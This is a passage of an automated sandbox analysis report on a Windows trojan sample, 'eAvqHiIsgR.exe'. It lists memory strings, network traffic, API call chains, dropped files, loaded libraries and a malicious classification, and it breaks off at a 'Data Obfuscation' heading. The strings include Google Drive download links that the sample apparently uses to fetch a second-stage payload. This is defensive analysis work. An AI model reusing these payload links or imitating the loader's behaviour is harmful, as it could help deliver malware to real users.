      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.go
      Source: eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: eAvqHiIsgR.exe, 0000000D.00000002.3133413447.00000000034F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-45cd-abca-deddda976288
      Source: eAvqHiIsgR.exe, 0000000D.00000002.3133413447.00000000034F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/P
      Source: eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/g
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download8
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2710930928.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadiderH
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
      Source: eAvqHiIsgR.exe, 0000000D.00000002.3152220460.0000000032A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2710930928.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133413447.00000000034F8000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133413447.0000000003534000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69
      Source: eAvqHiIsgR.exe, 0000000D.00000002.3133413447.00000000034F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69Z
      Source: eAvqHiIsgR.exe, 0000000D.00000002.3133413447.0000000003534000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69t
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userconte
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2710930928.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googl
      Source: eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?i
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021984973.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CY
      Source: eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.0000000003565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
      Source: eAvqHiIsgR.exe, 0000000D.00000002.3133413447.00000000034F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download(
      Source: eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download8
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2710930928.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2582349857.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloade
      Source: eAvqHiIsgR.exe, 0000000D.00000003.2427984653.0000000003570000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2582349857.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadid
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2710930928.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2427984653.0000000003570000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2582349857.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadl
      Source: eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadzh
      Source: eAvqHiIsgR.exe, 0000000D.00000001.2286991291.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.000000000354E000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.000000000354E000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.000000000354E000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.000000000354E000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.000000000354E000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49913 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.7:49918 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49948 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49980 version: TLS 1.2
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040535C
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403348
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile created: C:\Windows\Arder.lnkJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_004069455_2_00406945
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_0040711C5_2_0040711C
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_701A1A985_2_701A1A98
      Source: eAvqHiIsgR.exeStatic PE information: invalid certificate
      Source: eAvqHiIsgR.exe, 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs eAvqHiIsgR.exe
      Source: eAvqHiIsgR.exe, 0000000D.00000000.2283146200.0000000000458000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs eAvqHiIsgR.exe
      Source: eAvqHiIsgR.exeBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs eAvqHiIsgR.exe
      Source: eAvqHiIsgR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal76.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403348
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_0040460D
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_0040216B CoCreateInstance,MultiByteToWideChar,5_2_0040216B
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile created: C:\Users\user\tranchetJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsk5334.tmpJump to behavior
      Source: eAvqHiIsgR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: eAvqHiIsgR.exeReversingLabs: Detection: 60%
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile read: C:\Users\user\Desktop\eAvqHiIsgR.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"Jump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Arder.lnk.5.drLNK file: ..\Users\user\Disannex.And37
      Source: eAvqHiIsgR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: eAvqHiIsgR.exe, 0000000D.00000001.2286991291.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: eAvqHiIsgR.exe, 0000000D.00000001.2286991291.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
